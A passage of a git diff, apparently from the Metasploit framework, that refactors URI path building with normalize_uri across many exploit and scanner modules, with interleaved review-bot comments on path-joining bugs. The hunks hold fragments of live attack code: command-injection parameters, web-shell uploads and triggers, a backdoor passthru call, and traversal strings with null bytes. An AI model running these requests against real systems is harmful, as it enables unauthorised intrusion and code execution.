.../multi/http/log1cms_ajax_create_folder.rb | 6 ++-- .../multi/http/mobilecartly_upload_exec.rb | 6 ++-- .../multi/http/movabletype_upgrade_exec.rb | 2 +- .../multi/http/openfire_auth_bypass.rb | 8 +++--- .../multi/http/php_volunteer_upload_exec.rb | 2 +- .../multi/http/phpldapadmin_query_engine.rb | 8 ++---- modules/exploits/multi/http/phptax_exec.rb | 5 ++-- modules/exploits/multi/http/plone_popen2.rb | 8 ++---- .../exploits/multi/http/pmwiki_pagelist.rb | 3 +- .../exploits/multi/http/qdpm_upload_exec.rb | 8 +++--- .../exploits/multi/http/sit_file_upload.rb | 28 +++---------------- .../multi/http/sonicwall_gms_upload.rb | 2 +- .../multi/http/testlink_upload_exec.rb | 14 +++++----- .../exploits/multi/http/tomcat_mgr_deploy.rb | 6 ++-- .../exploits/multi/http/traq_plugin_exec.rb | 9 ++---- .../exploits/multi/http/vbseo_proc_deutf.rb | 8 ++---- .../multi/http/webpagetest_upload_exec.rb | 8 +++--- .../exploits/multi/http/wikka_spam_exec.rb | 12 ++++---- .../exploits/unix/webapp/basilic_diff_exec.rb | 6 ++-- .../unix/webapp/coppermine_piceditor.rb | 4 +-- .../unix/webapp/egallery_upload_exec.rb | 9 +++--- .../unix/webapp/joomla_tinybrowser.rb | 5 ++-- .../exploits/unix/webapp/openx_banner_edit.rb | 22 ++++++--------- .../unix/webapp/oscommerce_filemanager.rb | 4 +-- .../unix/webapp/php_wordpress_foxypress.rb | 9 +++--- .../exploits/unix/webapp/phpbb_highlight.rb | 6 ++-- .../exploits/unix/webapp/phpmyadmin_config.rb | 6 ++-- .../unix/webapp/projectpier_upload_exec.rb | 2 +- .../exploits/unix/webapp/redmine_scm_exec.rb | 2 +- .../unix/webapp/sphpblog_file_upload.rb | 14 +++++----- .../unix/webapp/sugarcrm_unserialize_exec.rb | 3 +- .../webapp/tikiwiki_graph_formula_exec.rb | 5 ++-- .../unix/webapp/tikiwiki_jhot_exec.rb | 8 +++--- .../unix/webapp/tikiwiki_unserialize_exec.rb | 8 +++--- modules/exploits/unix/webapp/twiki_history.rb | 6 ++-- modules/exploits/unix/webapp/twiki_search.rb | 8 +++--- .../http/sonicwall_scrutinizer_sqli.rb | 2 +- 
.../exploits/windows/http/sybase_easerver.rb | 2 +- .../windows/http/sysax_create_folder.rb | 8 +++--- .../exploits/windows/iis/ms02_065_msadc.rb | 2 +- modules/exploits/windows/iis/msadc.rb | 4 +-- 73 files changed, 212 insertions(+), 253 deletions(-) diff --git a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb index 25af468599a9..465e0ed78a07 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb @@ -96,7 +96,9 @@ def run juhash = Digest::MD5.hexdigest(juarray) juhash = juhash[0..9] # shortMD5 value for use as juhash - file_uri = "#{uri}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}" + uri_base_path = normalize_uri(uri, '/index.php') + + file_uri = "#{uri_base_path}?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}" vprint_status("Checking Encryption Key [#{i}/1000]: #{final}") begin diff --git a/modules/auxiliary/admin/tikiwiki/tikidblib.rb b/modules/auxiliary/admin/tikiwiki/tikidblib.rb index 231b4fa36077..695443c52805 100644 --- a/modules/auxiliary/admin/tikiwiki/tikidblib.rb +++ b/modules/auxiliary/admin/tikiwiki/tikidblib.rb @@ -47,8 +47,8 @@ def initialize(info = {}) def run print_status("Establishing a connection to the target...") - uri = normalize_uri(datastore['URI']) - rpath = uri + "/tiki-lastchanges.php?days=1&offset=0&sort_mode=" + uri = normalize_uri(datastore['URI'], '/tiki-lastchanges.php') + rpath = uri + "?days=1&offset=0&sort_mode=" res = send_request_raw({ 'uri' => rpath, diff --git a/modules/auxiliary/dos/http/webrick_regex.rb b/modules/auxiliary/dos/http/webrick_regex.rb index ee80b7a6242f..f886d688b6aa 100644 --- a/modules/auxiliary/dos/http/webrick_regex.rb +++ b/modules/auxiliary/dos/http/webrick_regex.rb 
@@ -39,7 +39,7 @@ def initialize(info = {}) def run begin o = { - 'uri' => normalize_uri(datastore['URI']) || '/', + 'uri' => normalize_uri(datastore['URI']), 'headers' => { 'If-None-Match' => %q{foo=""} + %q{bar="baz" } * 100 } diff --git a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb index db04a3a2f8fe..b677c8776319 100644 --- a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb +++ b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb @@ -91,7 +91,7 @@ def run_host(ip) key="w3tc_#{host}_#{site_id}_sql_#{query_md5}" key_md5 = ::Rex::Text.md5(key) hash_path = "/#{key_md5[0,1]}/#{key_md5[1,1]}/#{key_md5[2,1]}/#{key_md5}" - url = normalize_uri("/#{wordpress_url}#{datastore["WP_CONTENT_DIR"]}/w3tc/dbcache") + url = normalize_uri(wordpress_url, datastore["WP_CONTENT_DIR"], "/w3tc/dbcache") uri << hash_path result = nil diff --git a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb index 7f7166f93e90..13dc14ef16c9 100644 --- a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb +++ b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb @@ -49,8 +49,7 @@ def initialize(info = {}) def run_host(ip) - base = normalize_uri(target_uri.path) - base << '/' if base[-1,1] != '/' + base = target_uri.path peer = "#{ip}:#{rport}" fname = datastore['FILE'] @@ -61,7 +60,7 @@ def run_host(ip) res = send_request_cgi({ 'method' => 'GET', 'encode_params' => false, - 'uri' => "#{base}gmap/view_overlay.php", + 'uri' => normalize_uri(base, "gmap/view_overlay.php"), 'vars_get' => { 'overlay_type' => "#{traverse}#{fname}%00" } diff --git a/modules/auxiliary/scanner/http/clansphere_traversal.rb b/modules/auxiliary/scanner/http/clansphere_traversal.rb index 5919941a7530..f851e2596b9e 100644 --- a/modules/auxiliary/scanner/http/clansphere_traversal.rb 
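Review bot: In the wp_w3_total_cache_hash_extract hunk the changed line assigns the normalized path to `url`, but the next context line appends the hash path to `uri`. Unless `uri` is assigned outside this hunk, the cache path is appended to a different variable than the one just built. If `url` is the intended target, the line should read `url << hash_path`, or better `url = normalize_uri(url, hash_path)` so the join goes through the same helper. run_host continues outside the hunk.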
+++ b/modules/auxiliary/scanner/http/clansphere_traversal.rb @@ -46,7 +46,6 @@ def initialize(info = {}) def run_host(ip) base = normalize_uri(target_uri.path) - base << '/' if base[-1,1] != '/' peer = "#{ip}:#{rport}" @@ -58,7 +57,7 @@ def run_host(ip) res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{base}index.php", + 'uri' => normalize_uri(base, "index.php"), 'cookie' => "blah=blah; cs_lang=#{traverse}#{f}%00.png" }) diff --git a/modules/auxiliary/scanner/http/concrete5_member_list.rb b/modules/auxiliary/scanner/http/concrete5_member_list.rb index af224e664ad5..23e159e537ab 100644 --- a/modules/auxiliary/scanner/http/concrete5_member_list.rb +++ b/modules/auxiliary/scanner/http/concrete5_member_list.rb @@ -44,10 +44,10 @@ def peer end def run_host(rhost) - url = normalize_uri(datastore['URI']) + url = normalize_uri(datastore['URI'], '/index.php/members') begin - res = send_request_raw({'uri' => "#{url}/index.php/members"}) + res = send_request_raw({'uri' => url}) rescue ::Rex::ConnectionError print_error("#{peer} Unable to connect to #{url}") diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb index af6efdbdfcb7..4fdb5bab9317 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb @@ -60,8 +60,10 @@ def run_host(ip) print_status("#{@peer} - Connecting to SiteScope SOAP Interface") + uri = normalize_uri(@uri, 'services/APISiteScopeImpl') + res = send_request_cgi({ - 'uri' => "#{@uri}services/APISiteScopeImpl", + 'uri' => uri, 'method' => 'GET'}) if not res 
@@ -91,8 +93,10 @@ def access_configuration print_status("#{@peer} - Retrieving the SiteScope Configuration") + uri = normalize_uri(@uri, 'services/APISiteScopeImpl') + res = send_request_cgi({ - 'uri' => "#{@uri}services/APISiteScopeImpl", + 'uri' => uri, 'method' => 'POST', 'ctype' => 'text/xml; charset=UTF-8', 'data' => data, diff --git a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb index e58d4282b9c2..e3fb1fe573e2 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb @@ -59,8 +59,10 @@ def run_host(ip) print_status("#{@peer} - Connecting to SiteScope SOAP Interface") + uri = normalize_uri(@uri, 'services/APIMonitorImpl') + res = send_request_cgi({ - 'uri' => "#{@uri}services/APIMonitorImpl", + 'uri' => uri, 'method' => 'GET'}) if not res @@ -95,8 +97,10 @@ def accessfile print_status("#{@peer} - Retrieving the file contents") + uri = normalize_uri(@uri, 'services/APIMonitorImpl') + res = send_request_cgi({ - 'uri' => "#{@uri}services/APIMonitorImpl", + 'uri' => uri, 'method' => 'POST', 'ctype' => 'text/xml; charset=UTF-8', 'data' => data, diff --git a/modules/auxiliary/scanner/http/http_put.rb b/modules/auxiliary/scanner/http/http_put.rb index f7ab2fd9a74e..f0e18eedaee8 100644 --- a/modules/auxiliary/scanner/http/http_put.rb +++ b/modules/auxiliary/scanner/http/http_put.rb @@ -81,7 +81,7 @@ def do_put(path, data) begin res = send_request_cgi( { - 'uri' => path, + 'uri' => normalize_uri(path), 'method' => 'PUT', 'ctype' => 'text/plain', 'data' => data, @@ -102,7 +102,7 @@ def do_delete(path) begin res = send_request_cgi( { - 'uri' => path, + 'uri' => normalize_uri(path), 'method' => 'DELETE', 'ctype' => 'text/html', }, 20 
@@ -119,7 +119,7 @@ def do_delete(path) # Main function for the module, duh! # def run_host(ip) - path = normalize_uri(datastore['PATH']) + path = datastore['PATH'] data = datastore['FILEDATA'] if path[-1,1] != '/' diff --git a/modules/auxiliary/scanner/http/s40_traversal.rb b/modules/auxiliary/scanner/http/s40_traversal.rb index 5c0039054f26..111591aa13f0 100644 --- a/modules/auxiliary/scanner/http/s40_traversal.rb +++ b/modules/auxiliary/scanner/http/s40_traversal.rb @@ -44,7 +44,7 @@ def initialize(info = {}) end def run - uri = normalize_uri(target_uri.path) + uri = target_uri.path uri << '/' if uri[-1, 1] != '/' t = "/.." * datastore['DEPTH'] @@ -52,9 +52,10 @@ def run print_status("Retrieving #{datastore['FILE']}") # No permission to access.log or proc/self/environ, so this is all we do :-/ + uri = normalize_uri(uri, 'index.php') res = send_request_raw({ 'method' => 'GET', - 'uri' => "#{uri}index.php/?p=#{t}#{datastore['FILE']}%00" + 'uri' => "#{uri}/?p=#{t}#{datastore['FILE']}%00" }) if not res diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb index 730217ba95aa..01d38311ff1b 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb @@ -70,7 +70,7 @@ def enum_user(user='administrator', pass='pass') begin res = send_request_raw({ - 'uri' => normalize_uri(datastore['URI']) + "/services/Session", + 'uri' => normalize_uri(datastore['URI'], "/services/Session"), 'method' => 'POST', 'data' => data, 'headers' => diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb index 415ca736ee01..53ee160d57e1 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb 
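Review bot: The line `uri << '/' if uri[-1, 1] != '/'` kept in s40_traversal's run is now redundant and acts on a different object than before. With `uri = target_uri.path` the `<<` modifies the string returned by target_uri.path in place instead of a copy made by normalize_uri; whether that string is shared depends on target_uri, which is not visible here. normalize_uri(uri, 'index.php') already inserts the separator, so the line can be deleted. The same leftover appears in this commit in dolibarr_cmd_exec (`@uri.path << "/"`), symantec_web_gateway_exec, symantec_web_gateway_file_upload, vcms_upload, webid_converter and the check methods of ajaxplorer_checkinstall_exec and apprain_upload_exec.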
@@ -44,7 +44,7 @@ def initialize def run_host(ip) res = send_request_cgi({ - 'uri' => normalize_uri(datastore['URI']) + "/services/listServices", + 'uri' => normalize_uri(datastore['URI'], "/services/listServices"), 'method' => 'GET' }, 25) return if not res diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb index be3de4bd4972..4ff8434cebd6 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb @@ -43,7 +43,7 @@ def rport def run_host(ip) res = send_request_cgi({ - 'uri' => normalize_uri(datastore['URI']) + "/services/listServices", + 'uri' => normalize_uri(datastore['URI'], "/services/listServices"), 'method' => 'GET' }, 25) return if not res or res.code != 200 diff --git a/modules/auxiliary/scanner/http/vmware_update_manager_traversal.rb b/modules/auxiliary/scanner/http/vmware_update_manager_traversal.rb index 1efaf6bbff13..2d642d9c4325 100644 --- a/modules/auxiliary/scanner/http/vmware_update_manager_traversal.rb +++ b/modules/auxiliary/scanner/http/vmware_update_manager_traversal.rb @@ -39,7 +39,7 @@ def initialize(info={}) register_options( [ Opt::RPORT(9084), - OptString.new('URIPATH', [true, 'URI path to the downloads/', '/vci/downloads/']), + OptString.new('URIPATH', [true, 'URI path to the downloads', '/vci/downloads/']), OptString.new('FILE', [true, 'Define the remote file to download', 'boot.ini']) ], self.class) end @@ -47,7 +47,7 @@ def initialize(info={}) def run_host(ip) fname = File.basename(datastore['FILE']) traversal = ".\\..\\..\\..\\..\\..\\..\\..\\" - uri = normalize_uri(datastore['URIPATH'])+ '/' + traversal + datastore['FILE'] + uri = normalize_uri(datastore['URIPATH']) + traversal + datastore['FILE'] print_status("#{rhost}:#{rport} - Requesting: #{uri}") 
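Review bot: In vmware_update_manager_traversal the separator between URIPATH and the file part now depends on the option value ending in "/". The old code added `'/'` explicitly; the new `normalize_uri(datastore['URIPATH']) + traversal + datastore['FILE']` fuses the two when the user sets a value without a trailing slash, and the option description lost its "downloads/" hint in the same change. `uri = normalize_uri(datastore['URIPATH'], '/') + traversal + datastore['FILE']` restores the separator for both forms of the option.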
diff --git a/modules/exploits/linux/http/dolibarr_cmd_exec.rb b/modules/exploits/linux/http/dolibarr_cmd_exec.rb index abf9fb3f4692..d295430baa26 100644 --- a/modules/exploits/linux/http/dolibarr_cmd_exec.rb +++ b/modules/exploits/linux/http/dolibarr_cmd_exec.rb @@ -115,7 +115,7 @@ def login(sid, token) end def exploit - @uri = normalize_uri(target_uri) + @uri = target_uri @uri.path << "/" if @uri.path[-1, 1] != "/" peer = "#{rhost}:#{rport}" @@ -141,7 +141,7 @@ def exploit print_status("#{peer} - Sending malicious request...") res = send_request_cgi({ 'method' => 'POST', - 'uri' => @uri.path + "admin/tools/export.php", + 'uri' => normalize_uri(@uri.path, "admin/tools/export.php"), 'cookie' => sid, 'vars_post' => { 'token' => token, diff --git a/modules/exploits/linux/http/symantec_web_gateway_exec.rb b/modules/exploits/linux/http/symantec_web_gateway_exec.rb index cd1b6859c8bc..10a211bc1323 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_exec.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_exec.rb @@ -69,7 +69,7 @@ def check end def exploit - uri = normalize_uri(target_uri.path) + uri = target_uri.path uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @@ -80,7 +80,7 @@ def exploit print_status("#{peer} - Sending Command injection") res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{uri}spywall/ipchange.php", + 'uri' => normalize_uri(uri, 'spywall/ipchange.php'), 'data' => post_data }) diff --git a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb index 58b8c6e90fcc..6a17584b58b8 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb @@ -80,7 +80,7 @@ def on_new_session(client) end def exploit - uri = normalize_uri(target_uri.path) + uri = target_uri.path uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" 
@@ -97,7 +97,7 @@ def exploit print_status("#{peer} - Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{uri}spywall/blocked_file.php", + 'uri' => normalize_uri(uri, "spywall/blocked_file.php"), 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => post_data.to_s }) diff --git a/modules/exploits/linux/http/vcms_upload.rb b/modules/exploits/linux/http/vcms_upload.rb index d5f5fc8acd53..8ed47f8b1b22 100644 --- a/modules/exploits/linux/http/vcms_upload.rb +++ b/modules/exploits/linux/http/vcms_upload.rb @@ -79,7 +79,7 @@ def check def exploit peer = "#{rhost}:#{rport}" - base = normalize_uri(target_uri.path) + base = target_uri.path base << '/' if base[-1,1] != '/' @payload_name = "#{rand_text_alpha(5)}.php" @@ -94,7 +94,7 @@ def exploit print_status("#{peer} Uploading payload: #{@payload_name}") res = send_request_cgi({ - 'uri' => "#{base}includes/inline_image_upload.php", + 'uri' => normalize_uri(base, 'includes/inline_image_upload.php'), 'method' => 'POST', 'ctype' => 'multipart/form-data; boundary=----x', 'data' => post_data diff --git a/modules/exploits/linux/http/webcalendar_settings_exec.rb b/modules/exploits/linux/http/webcalendar_settings_exec.rb index 4bc1f62b3a6a..7e0086bc12a1 100644 --- a/modules/exploits/linux/http/webcalendar_settings_exec.rb +++ b/modules/exploits/linux/http/webcalendar_settings_exec.rb @@ -73,8 +73,7 @@ def check def exploit peer = "#{rhost}:#{rport}" - uri = normalize_uri(target_uri.path) - uri << '/' if uri[-1, 1] != '/' + uri = target_uri.path print_status("#{peer} - Housing php payload...") @@ -86,7 +85,7 @@ def exploit post_data << "\n"*2 send_request_cgi({ 'method' => 'POST', - 'uri' => "#{uri}install/index.php", + 'uri' => normalize_uri(uri, 'install/index.php'), 'data' => post_data }) 
@@ -95,7 +94,7 @@ def exploit # Execute our payload send_request_raw({ 'method' => 'GET', - 'uri' => "#{uri}includes/settings.php", + 'uri' => normalize_uri(uri, 'includes/settings.php'), 'headers' => { 'Cmd' => Rex::Text.encode_base64(payload.encoded) } diff --git a/modules/exploits/linux/http/webid_converter.rb b/modules/exploits/linux/http/webid_converter.rb index 4c7fd858007e..e0c28f013938 100644 --- a/modules/exploits/linux/http/webid_converter.rb +++ b/modules/exploits/linux/http/webid_converter.rb @@ -55,12 +55,12 @@ def initialize(info = {}) end def check - uri = normalize_uri(target_uri.path) + uri = target_uri.path uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET', - 'uri' => uri + "docs/changes.txt" + 'uri' => normalize_uri(uri, "docs/changes.txt") }) if res and res.code == 200 and res.body =~ /1\.0\.2 \- 17\/01\/11/ @@ -122,7 +122,7 @@ def on_new_session(client) def exploit - uri = normalize_uri(target_uri.path) + uri = target_uri.path uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @@ -131,7 +131,7 @@ def exploit print_status("#{peer} - Injecting the PHP payload") response = send_request_cgi({ - 'uri' => uri + "converter.php", + 'uri' => normalize_uri(uri, "converter.php"), 'method' => "POST", 'vars_post' => { "action" => "convert", @@ -149,7 +149,7 @@ def exploit timeout = 0.01 response = send_request_cgi({ - 'uri' => uri + "includes/currencies.php", + 'uri' => normalize_uri(uri, "includes/currencies.php"), 'method' => "GET", 'headers' => { 'Connection' => "close", diff --git a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb index d9c8e87e8dbc..404bf9f31d65 100644 --- a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb +++ b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb 
@@ -57,13 +57,13 @@ def initialize(info = {}) end def check - uri = normalize_uri(target_uri.path) + uri = target_uri.path uri << '/' if uri[-1,1] != '/' clue = Rex::Text::rand_text_alpha(rand(5) + 5) res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{uri}plugins/access.ssh/checkInstall.php", + 'uri' => normalize_uri(uri, 'plugins/access.ssh/checkInstall.php'), 'vars_get' => { 'destServer' => "||echo #{clue}" } @@ -79,13 +79,12 @@ def check def exploit peer = "#{rhost}:#{rport}" - uri = normalize_uri(target_uri.path) - uri << '/' if uri[-1,1] != '/' + uri = target_uri.path # Trigger the command execution bug res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{uri}plugins/access.ssh/checkInstall.php", + 'uri' => normalize_uri(uri, "plugins/access.ssh/checkInstall.php"), 'vars_get' => { 'destServer' => "||#{payload.encoded}" diff --git a/modules/exploits/multi/http/apprain_upload_exec.rb b/modules/exploits/multi/http/apprain_upload_exec.rb index 06e6fdc6a04e..fc485ebc4420 100644 --- a/modules/exploits/multi/http/apprain_upload_exec.rb +++ b/modules/exploits/multi/http/apprain_upload_exec.rb @@ -59,12 +59,12 @@ def initialize(info={}) end def check - uri = normalize_uri(target_uri.path) + uri = target_uri.path uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{uri}addons/uploadify/uploadify.php" + 'uri' => normalize_uri(uri, 'addons/uploadify/uploadify.php') }) if res and res.code == 200 and res.body.empty? @@ -75,8 +75,7 @@ def check end def exploit - uri = normalize_uri(target_uri.path) - uri << '/' if uri[-1,1] != '/' + uri = target_uri.path peer = "#{rhost}:#{rport}" payload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php' 
@@ -91,7 +90,7 @@ def exploit print_status("#{peer} - Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{uri}addons/uploadify/uploadify.php", + 'uri' => normalize_uri(uri, "addons/uploadify/uploadify.php"), 'ctype' => 'multipart/form-data; boundary=o0oOo0o', 'data' => post_data }) @@ -107,7 +106,7 @@ def exploit # Execute our payload res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{uri}addons/uploadify/uploads/#{payload_name}" + 'uri' => normalize_uri(uri, "addons/uploadify/uploads/#{payload_name}") }) # If we don't get a 200 when we request our malicious payload, we suspect diff --git a/modules/exploits/multi/http/auxilium_upload_exec.rb b/modules/exploits/multi/http/auxilium_upload_exec.rb index 2a314cb411de..cb0147c8c469 100644 --- a/modules/exploits/multi/http/auxilium_upload_exec.rb +++ b/modules/exploits/multi/http/auxilium_upload_exec.rb @@ -56,11 +56,12 @@ def initialize(info={}) def check - uri = normalize_uri(target_uri.path) - uri << '/' if uri[-1,1] != '/' + uri = target_uri.path base = File.dirname("#{uri}.") - res = send_request_raw({'uri'=>"#{base}/admin/sitebanners/upload_banners.php"}) + res = send_request_raw({ + 'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php") + }) if res and res.body =~ /\<title\>Pet Rate Admin \- Banner Manager\<\/title\>/ return Exploit::CheckCode::Appears else @@ -83,7 +84,7 @@ def upload_exec(base, php_fname, p) print_status("#{@peer} - Uploading payload (#{p.length.to_s} bytes)...") res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{base}/admin/sitebanners/upload_banners.php", + 'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data, }) 
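Review bot: In auxilium_upload_exec's check, `base = File.dirname("#{uri}.")` relied on `uri` ending in "/", which the removed `uri << '/'` line guaranteed. With `uri = target_uri.path` and a TARGETURI given without a trailing slash, "#{uri}." ends in a file-like component and File.dirname drops the last directory, so the request goes to the parent path. Building the request path directly avoids the trick: `'uri' => normalize_uri(target_uri.path, 'admin/sitebanners/upload_banners.php')`. How `base` is computed for upload_exec is outside the visible hunks and should be checked for the same assumption.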
@@ -94,7 +95,7 @@ def upload_exec(base, php_fname, p) end print_status("#{@peer} - Requesting '#{php_fname}'...") - res = send_request_raw({'uri'=>"#{base}/banners/#{php_fname}"}) + res = send_request_raw({'uri'=>normalize_uri("#{base}/banners/#{php_fname}")}) if res and res.code == 404 print_error("#{@peer} - Upload unsuccessful: #{res.code.to_s}") return diff --git a/modules/exploits/multi/http/axis2_deployer.rb b/modules/exploits/multi/http/axis2_deployer.rb index f9060db244ba..565d73a293c1 100644 --- a/modules/exploits/multi/http/axis2_deployer.rb +++ b/modules/exploits/multi/http/axis2_deployer.rb @@ -267,7 +267,7 @@ def exploit res = send_request_cgi( { 'method' => 'POST', - 'uri' => "#{rpath}/axis2-admin/login", + 'uri' => normalize_uri(rpath, '/axis2-admin/login'), 'ctype' => 'application/x-www-form-urlencoded', 'data' => "userName=#{user}&password=#{pass}&submit=+Login+", }, 25) @@ -303,7 +303,7 @@ def exploit res = send_request_cgi( { 'method' => 'POST', - 'uri' => "#{rpath}/axis2-admin/login", + 'uri' => normalize_uri(rpath, '/axis2-admin/login'), 'ctype' => 'application/x-www-form-urlencoded', 'data' => "userName=#{user}&password=#{pass}&submit=+Login+", }, 25) diff --git a/modules/exploits/multi/http/cuteflow_upload_exec.rb b/modules/exploits/multi/http/cuteflow_upload_exec.rb index 40dfc9a09bf8..2f413cec6bf5 100644 --- a/modules/exploits/multi/http/cuteflow_upload_exec.rb +++ b/modules/exploits/multi/http/cuteflow_upload_exec.rb @@ -62,7 +62,7 @@ def check base << '/' if base[-1, 1] != '/' res = send_request_raw({ 'method' => 'GET', - 'uri' => "#{base}" + 'uri' => base }) if res.body =~ /\<strong style\=\"font\-size\:8pt\;font\-weight\:normal\"\>Version 2\.11\.2\<\/strong\>\<br\>/ 
@@ -90,7 +90,7 @@ def upload(base, fname, file) # upload res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{base}pages/restart_circulation_values_write.php", + 'uri' => normalize_uri(base, "pages/restart_circulation_values_write.php"), 'ctype' => "multipart/form-data; boundary=#{boundary}", 'data' => data_post, }) @@ -117,7 +117,7 @@ def exploit print_status("#{@peer} - Retrieving file: #{fname}") send_request_raw({ 'method' => 'GET', - 'uri' => "#{base}upload/___1/#{fname}" + 'uri' => normalize_uri(base, "upload/___1/#{fname}") }) handler diff --git a/modules/exploits/multi/http/horde_href_backdoor.rb b/modules/exploits/multi/http/horde_href_backdoor.rb index 0c36c206c2ce..e5df62a1a8ff 100644 --- a/modules/exploits/multi/http/horde_href_backdoor.rb +++ b/modules/exploits/multi/http/horde_href_backdoor.rb @@ -59,14 +59,14 @@ def initialize(info = {}) def exploit # Make sure the URI begins with a slash - uri = normalize_uri(datastore['URI']) + uri = datastore['URI'] function = "passthru" key = Rex::Text.rand_text_alpha(6) arguments = "echo #{key}`"+payload.raw+"`#{key}" res = send_request_cgi({ - 'uri' => uri + "/services/javascript.php", + 'uri' => normalize_uri(uri, "/services/javascript.php"), 'method' => 'POST', 'ctype' => 'application/x-www-form-urlencoded', 'data' => "app="+datastore['APP']+"&file=open_calendar.js", diff --git a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb index f196e486192f..4b34db401024 100644 --- a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb +++ b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb @@ -101,7 +101,7 @@ def exploit # Generate an initial JSESSIONID print_status("#{@peer} - Retrieving an initial JSESSIONID") res = send_request_cgi( - 'uri' => "#{@uri}servlet/Main", + 'uri' => normalize_uri(@uri, 'servlet/Main'), 'method' => 'POST' ) 
@@ -118,7 +118,7 @@ def exploit print_status("#{@peer} - Authenticating on HP SiteScope Configuration") res = send_request_cgi( { - 'uri' => "#{@uri}j_security_check", + 'uri' => normalize_uri(@uri, 'j_security_check'), 'method' => 'POST', 'data' => login_data, 'ctype' => "application/x-www-form-urlencoded", @@ -264,7 +264,7 @@ def exploit print_status("#{@peer} - Uploading the JSP") res = send_request_cgi( { - 'uri' => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true", + 'uri' => normalize_uri(@uri, 'upload') + "?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true", 'method' => 'POST', 'data' => post_data.to_s, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", @@ -285,7 +285,7 @@ def exploit print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...") send_request_cgi( { - 'uri' => "#{@uri}#{@jsp_name}.jsp", + 'uri' => normalize_uri(@uri, "#{@jsp_name}.jsp"), 'method' => 'GET', 'headers' => { @@ -334,7 +334,7 @@ def create_user data << "</wsns0:Envelope>" + "\r\n" res = send_request_cgi({ - 'uri' => "#{@uri}services/APIPreferenceImpl", + 'uri' => normalize_uri(@uri, 'services/APIPreferenceImpl'), 'method' => 'POST', 'ctype' => 'text/xml; charset=UTF-8', 'data' => data, diff --git 